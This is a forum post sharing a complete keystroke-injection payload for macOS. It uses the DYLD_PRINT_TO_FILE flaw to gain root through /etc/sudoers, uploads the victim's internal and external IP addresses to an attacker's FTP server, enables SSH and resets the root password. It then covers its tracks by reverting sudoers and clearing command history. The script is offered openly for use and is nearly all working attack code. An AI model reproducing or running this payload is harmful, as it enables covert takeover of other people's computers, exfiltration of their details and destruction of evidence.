Jump to content

[Payload] OS X Root SSH Backdoor


Recommended Posts

Hi everyone !

Following my previous post on an adaptation of the recently discovered DYLD_PRINT_TO_FILE privilege escalation vulnerability, I decided to create a full use of this adaptation.

This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac. The payload then activates the ssh daemon, changes the root password to anything you want, and uploads a text file containing both the internal and external IP adresses of the victim to an ftp server of your choice. The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app. The attacker can then SSH or SFTP to the victim machine using the modified root password and the IP adress in the text file.

/!\ MAKE SURE TO REPLACE THE FTP SERVER ADRESS, USERNAME AND PASSWORD, AS WELL AS THE NEW ROOT PASSWORD WITH WHAT YOU WANT THEM TO BE ! /!\

I hope you like it !

********************* USE THIS PAYLOAD AT YOUR OWN RISK ! *********************

Here is the code (also on my GitHub) :

REM Author: V3sth4cks153
REM Title: OS X DYLD_PRINT_TO_FILE Root SSH Backdoor
REM This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac.
REM The payload then activates the ssh daemon, and changes the root password to anything you want, and uploads a text file containing both the internal and external IP adresses of the victim to an ftp server of your choice.
REM The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app.
REM
REM /!\ MAKE SURE TO REPLACE THE FTP SERVER ADRESS, USERNAME AND PASSWORD, AS WELL AS THE NEW ROOT PASSWORD WITH WHAT YOU WANT THEM TO BE ! /!\
REM
REM ********************* USE THIS AT YOUR OWN RISK *********************
REM
REM --------------- OPEN TERMINAL ---------------
DELAY 3000
GUI SPACE
DELAY 100
STRING Terminal
DELAY 500
ENTER
DELAY 1000
REM --------------- GO TO HOME DIRECTORY ---------------
STRING cd
ENTER
DELAY 100
REM --------------- ESCALATE PRIVS ---------------
STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
ENTER 
REM --------------- GET IP AND UPLOAD TO FTP ---------------
DELAY 200
STRING curl -s checkip.dyndns.org | sed -e 's/.*Current IP Address: //' -e 's/<.*$//' > ip.txt
ENTER
DELAY 1200
STRING ifconfig |grep inet >> ip.txt
ENTER
DELAY 500
STRING ftp SERVER_ADRESS
ENTER
DELAY 500
STRING USERNAME
ENTER
DELAY 200
STRING PASSWORD
ENTER
DELAY 1000
STRING put ip.txt
ENTER
DELAY 1000
STRING exit
ENTER
DELAY 500
STRING rm ip.txt
ENTER
REM --------------- ENABLE SSH ---------------
STRING systemsetup -f -setremotelogin on
ENTER
REM --------------- CHANGE ROOT PASSWORD ---------------
STRING passwd
ENTER
STRING NEW_ROOT_PASSWORD
ENTER
DELAY 500
STRING NEW_ROOT_PASSWORD
ENTER
DELAY 1500
REM --------------- CLEANUP ---------------
STRING cd
ENTER
STRING visudo -f /etc/sudoers
ENTER
DELAY 500
STRING :$d
ENTER
STRING :w
ENTER
STRING :x
ENTER
STRING history -c
ENTER
DELAY 100
STRING exit
ENTER
STRING history -c
ENTER
GUI q
Edited by V3sth4cks153
Link to comment
Share on other sites

  • 1 month later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...